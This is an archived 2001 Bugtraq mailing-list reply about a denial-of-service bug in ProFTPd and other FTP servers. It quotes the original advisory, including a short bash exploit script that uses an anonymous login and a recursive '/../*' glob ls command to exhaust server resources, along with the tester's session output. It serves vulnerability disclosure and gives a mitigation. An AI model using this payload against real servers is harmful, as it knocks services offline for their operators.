[22355] in bugtraq
Re: Multiple-Vendor-FTP-Vuln. (old?)
daemon@ATHENA.MIT.EDU (Dmitriy Kropivnitskiy)
Tue Aug 21 12:59:49 2001
Date: Tue, 21 Aug 2001 10:46:39 -0400
From: Dmitriy Kropivnitskiy <dkropivnitskiy@tigertesting.com>
To: bugtraq@securityfocus.com
Message-ID: <20010821104639.A1596@zaphod>
Reply-To: Dmitriy Kropivnitskiy <dkropivnitskiy@tigertesting.com>
Mail-Followup-To: Dmitriy Kropivnitskiy <dkropivnitskiy@tigertesting.com>,
bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200108201320.f7KDKZK26818@mailgate4.cinetic.de>; from IphantomI@web.de on Mon, Aug 20, 2001 at 03:20:35PM +0200
Tested on Mandrake 8.0. ProFTPd version is proftpd-1.2.2-0.rc1.3mdk.
Here are results:
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of
/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Transfer complete.
226 Quotas off
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of
/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Transfer complete.
226 Quotas off
ftp> quit
221 Goodbye.
[root@system user]# ps aux | grep ftp
nobody 3773 0.0 0.4 2152 1052 ? S 10:44 0:00 proftpd (acceptin
On Mon, Aug 20, 2001 at 03:20:35PM +0200, Enrico Kern wrote:
> Hi,
>
> i tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on =
> many new Linux-Dist.. When a user logged in in ftp and type
> the ls command the in.ftpd takes over 90 percent cpu-usage and execute =
> the command 2 or 3x than the full system hang up. it also works in =
> console. I wonder that is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ =
> in march 01, but
> it still works so i post it again.
>
> affected:
>
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2
> FreeBSD 4.3
> AiX V 4.3
> other?
>
>
> Not vuln.:
>
> latest Wu-Ftpd
> Windows FTP-Server
>
>
> Exploit:
>
> #!/bin/bash=20
> ftp -n FTP-SERVER<<\end=20
> quot user anonymous
> bin
> quot pass shitold@bug.com
> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> bye=20
> end=20
>
> Fix:
>
> set cpu-limit for your anonymous user.
>
>
> -------------------------
> Enrico Kern
> www.h07.org
> _______________________________________________________________________
> 1.000.000 DM gewinnen - kostenlos tippen - http://millionenklick.web.de
> IhrName@web.de, 8MB Speicher, Verschluesselung - http://freemail.web.de
>
>
